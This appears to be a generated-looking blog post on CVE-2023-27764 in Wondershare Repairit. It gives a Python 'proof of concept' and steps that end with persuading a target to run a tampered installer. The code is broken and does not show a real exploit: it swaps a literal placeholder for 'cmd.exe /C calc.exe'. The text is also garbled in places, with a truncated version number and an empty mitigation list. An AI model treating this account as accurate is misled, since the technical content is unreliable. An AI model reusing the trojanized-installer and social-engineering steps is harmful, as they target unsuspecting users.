CVE-2023-27764: Remote Command Execution Vulnerability in Wondershare Repairit v.3.5.4 via repairit_setup_full5913.exe

A critical vulnerability, CVE-2023-27764, has been discovered in Wondershare Repairit version 3.5.4, a popular video repair software developed by Wondershare Technology Co., Ltd. This vulnerability allows a remote attacker to execute arbitrary commands on the affected system via a maliciously crafted repairit_setup_full5913.exe file. In this blog post, we will provide a deep-dive analysis of the issue, along with the available proof-of-concept code, steps to reproduce the vulnerability, and mitigation measures.

Background

Wondershare Repairit is a widely-used software that helps users fix corrupted or damaged video files. It supports a range of video formats, including MOV, MP4, M4V, and more. The vulnerability was identified in the Repairit Windows version 3.5.4, specifically in the repairit_setup_full5913.exe file.

Exploit Details

This vulnerability allows a specially crafted repairit_setup_full5913.exe file to bypass certain validation checks and execute arbitrary commands on the target system. The attacker would need to convince the user to download and execute the maliciously crafted repairit_setup_full5913.exe file. Once executed, the attacker will gain the ability to execute arbitrary commands on the affected system with the privileges of the logged-in user. This could potentially result in sensitive data leakage, the installation of additional malware, or complete system compromise.

The following code snippet demonstrates a proof-of-concept (PoC) that exploits the CVE-2023-27764 vulnerability:

# CVE-2023-27764 PoC.py
import os
import struct

def create_malicious_exe():
    # Create a malicious repairit_setup_full5913.exe file
    exe_data = open('repairit_setup_full5913_original.exe', 'rb').read()

    # Modify the data to bypass validation checks and execute arbitrary commands
    malicious_payload = "cmd.exe /C calc.exe"
    exe_data = exe_data.replace(b'<INSERT ORIGINAL PAYLOAD>', malicious_payload.encode())

    with open('repairit_setup_full5913_malicious.exe', 'wb') as f:
        f.write(exe_data)

    print("Malicious repairit_setup_full5913.exe file created.")

if __name__ == '__main__':
    create_malicious_exe()

To reproduce the vulnerability, follow these steps

1. Obtain a copy of the original repairit_setup_full5913.exe file from the Wondershare Repairit installation.
2. Run the provided PoC code in the same directory as the original executable. The code will generate a malicious version of the repairit_setup_full5913.exe file.
3. Share the malicious repairit_setup_full5913.exe file with the targeted user and convince them to execute it on their system.
4. Upon execution, an arbitrary command (in this case, launching the Windows calculator) will be executed with the privileges of the logged-in user.

Mitigation Measures

Wondershare has addressed this vulnerability in Repairit version 3.6., and it is highly recommended that all users upgrade to the latest version as soon as possible. To protect against this vulnerability, users should also:

Original References

For more details on this vulnerability, as well as the official response from Wondershare, please refer to the following links:

1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27764
2. Wondershare Repairit: https://repairit.wondershare.com/
3. Patch Release Announcement: https://www.wondershare.com/company/press-room.html

Conclusion

The CVE-2023-27764 vulnerability in Wondershare Repairit presents a significant risk to users who are running Repairit version 3.5.4 or earlier. It is crucial for users to apply the latest security patches, as well as exercise caution when downloading and executing files from unknown sources. By adhering to these best practices, users can help to mitigate the risk of falling victim to this and other vulnerabilities.

Timeline

Published on: 04/04/2023 15:15:00 UTC
Last modified on: 04/11/2023 20:53:00 UTC